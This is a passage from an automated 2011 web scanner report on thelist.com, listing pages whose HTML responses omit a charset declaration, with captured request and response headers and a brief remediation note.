If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


10.1. http://www.thelist.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /

Request

GET / HTTP/1.1
Host: www.thelist.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 12:46:54 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 12:47:54 GMT
Content-Type: text/html
Content-Length: 45863

<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>
<META NAME="description" CONTENT="Find an ISP that fits your internet access needs on TheList.com. TheList.com is
...[SNIP]...

10.2. http://www.thelist.com/HTML/5/2349355.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /HTML/5/2349355.html

Request

GET /HTML/5/2349355.html HTTP/1.1
Host: www.thelist.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107; qsg=14508; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026063098:ss=1298026063098; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; __utmc=219744476; __utmb=219744476.2.10.1298033251; _bizo_cksm_crc32=B0104A9B; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; _bizo_cksm=1260A44F5CFBD6E0; _bizo_np_stats=107%3D64%2C217%3D123%2C224%3D2442%2C155%3D6270%2C

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 12:47:47 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 12:48:47 GMT
Content-Type: text/html
Content-Length: 44997

<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>

<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630903/cmp0.js"></script>
<script langua
...[SNIP]...

10.3. http://www.thelist.com/HTML/7/2331187.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /HTML/7/2331187.html

Request

GET /HTML/7/2331187.html HTTP/1.1
Host: www.thelist.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107; qsg=14508; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026063098:ss=1298026063098; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; __utmc=219744476; __utmb=219744476.2.10.1298033251; _bizo_cksm_crc32=B0104A9B; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; _bizo_cksm=1260A44F5CFBD6E0; _bizo_np_stats=107%3D64%2C217%3D123%2C224%3D2442%2C155%3D6270%2C

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 12:47:36 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 12:48:36 GMT
Content-Type: text/html
Content-Length: 44470

<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>

<script src="/icom_includes/quad/thelist/config.js"></script>
<script src="/icom_includes/quad/QUAD_AD.js"></scr
...[SNIP]...

10.4. http://www.thelist.com/add.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /add.php

Request

GET /add.php HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:44 GMT
Server: Apache
Set-Cookie: PHPSESSID=c45d25bbcea4be6d7b9a75284acc4618; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 47067


<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>
<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630903/cmp0.js"></script>
<script langua
...[SNIP]...

10.5. http://www.thelist.com/areacode.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /areacode.html

Request

GET /areacode.html HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:24 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 14:53:24 GMT
Connection: close
Content-Type: text/html
Content-Length: 58308

<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>

<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630903/cmp0.js"></script>
<script langua
...[SNIP]...

10.6. http://www.thelist.com/countrycode.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /countrycode.html

Request

GET /countrycode.html HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:25 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 14:53:25 GMT
Connection: close
Content-Type: text/html
Content-Length: 70266

<HTML>
<HEAD>
<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630903/cmp0.js"></script>
<script language="javascript" src="http://e1.cdn.qnsr.com/jsc/e1/fx.js"></script>
<scrip
...[SNIP]...

10.7. http://www.thelist.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.thelist.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107; qsg=14508; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026063098:ss=1298026063098; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; __utmc=219744476; __utmb=219744476.2.10.1298033251; _bizo_cksm_crc32=B0104A9B; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; _bizo_cksm=1260A44F5CFBD6E0; _bizo_np_stats=107%3D64%2C217%3D123%2C224%3D2442%2C155%3D6270%2C

Response

HTTP/1.1 404 Not Found
Date: Fri, 18 Feb 2011 12:47:19 GMT
Server: Apache
Content-Type: text/html
Content-Length: 36769

<html>
<head>
<title>internet.com 404 and Network Map</title>
</head>
<LINK href="http://www.internet.com/styles/text.css" type="text/css" rel="stylesheet">
<body leftmargin="0" marginwidth="0"
...[SNIP]...

10.8. http://www.thelist.com/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /index.html

Request

GET /index.html HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:23 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 14:53:23 GMT
Connection: close
Content-Type: text/html
Content-Length: 45883

<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>
<META NAME="description" CONTENT="Find an ISP that fits your internet access needs on TheList.com. TheList.com is
...[SNIP]...

10.9. http://www.thelist.com/misc/canada/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /misc/canada/

Request

GET /misc/canada/ HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:25 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 14:53:25 GMT
Connection: close
Content-Type: text/html
Content-Length: 56020

<HTML>
<HEAD>
<TITLE>
Canadian Nationwide ISPs
</TITLE>

<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630909/cmp0.js"></script>
<script language="javascript" src="http:/
...[SNIP]...

10.10. http://www.thelist.com/misc/usa/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /misc/usa/

Request

GET /misc/usa/ HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:29 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 14:53:29 GMT
Connection: close
Content-Type: text/html
Content-Length: 72550

<HTML>
<HEAD>
<TITLE>
U.S. Nationwide ISPs
</TITLE>

<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630909/cmp0.js"></script>
<script language="javascript" src="http://e1.
...[SNIP]...

10.11. http://www.thelist.com/update.php  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /update.php

Request

GET /update.php HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:25 GMT
Server: Apache
Set-Cookie: PHPSESSID=27593532e2c189e40e78820c035b03b0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 27503


<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>
<script language="JavaScript" src="http://e1.cdn.qnsr.com/jsc/e1/fc.js"></script>
<link rel="stylesheet" href="
...[SNIP]...

Report generated by CloudScan Vulnerability Crawler at Fri Feb 25 15:19:23 CST 2011.